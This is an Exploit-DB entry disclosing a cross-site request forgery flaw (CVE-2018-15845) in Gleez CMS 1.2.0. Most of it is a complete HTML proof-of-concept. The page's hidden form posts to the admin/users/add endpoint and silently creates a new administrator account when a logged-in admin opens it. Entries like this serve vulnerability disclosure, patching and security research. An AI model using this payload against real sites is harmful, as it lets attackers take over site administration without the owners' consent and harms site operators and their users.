Gleez CMS 1.2.0 - Cross-Site Request Forgery (Add Admin)

EDB-ID: 45258
Author: GunEggWang
Published: 2018-08-27
CVE: CVE-2018-15845
Type: Webapps
Platform: PHP
Vulnerable App: N/A 

 # Date: 2018-08-24 
 # Exploit Author: GunEggWang 
 # Vendor Homepage: https://gleezcms.org/ 
 # Software Link: https://github.com/gleez/cms 
 # Version: 1.2.0 
 # CVE : CVE-2018-15845 
  
 # Description:  
 # There is a CSRF vulnerability that can add an administrator account in  
 # Gleez CMS 1.2.0 via admin/users/add. (https://github.com/gleez/cms/issues/800) 
 # After the administrator logged in,open the POC,that will create an new admin account unexcused. 
 # POC: 
  
 <html> 
   <!-- CSRF PoC - generated by Burp Suite Professional --> 
   <body> 
   <script>history.pushState('', '', '/')</script> 
     <form action="https://demo.gleezcms.org/admin/users/add?0=" method="POST"> 
       <input type="hidden" name="_token" value="18eabd0645699b3eec1686301a684392e8a4735a" /> 
       <input type="hidden" name="_action" value="909998bbc9e60ce40ae378a1055b46f3" /> 
       <input type="hidden" name="name" value="test" /> 
       <input type="hidden" name="pass" value="test" /> 
       <input type="hidden" name="nick" value="test" /> 
       <input type="hidden" name="mail" value="[email protected]" /> 
       <input type="hidden" name="status" value="1" /> 
       <input type="hidden" name="roles[admin]" value="Administrative user, has access to everything." /> 
       <input type="hidden" name="site_url" value="http://demo.gleezcms.org/" /> 
       <input type="hidden" name="user" value="" /> 
       <input type="submit" value="Submit request" /> 
     </form> 
   </body> 
 </html>

Source: www.exploit-db.com
Related Posts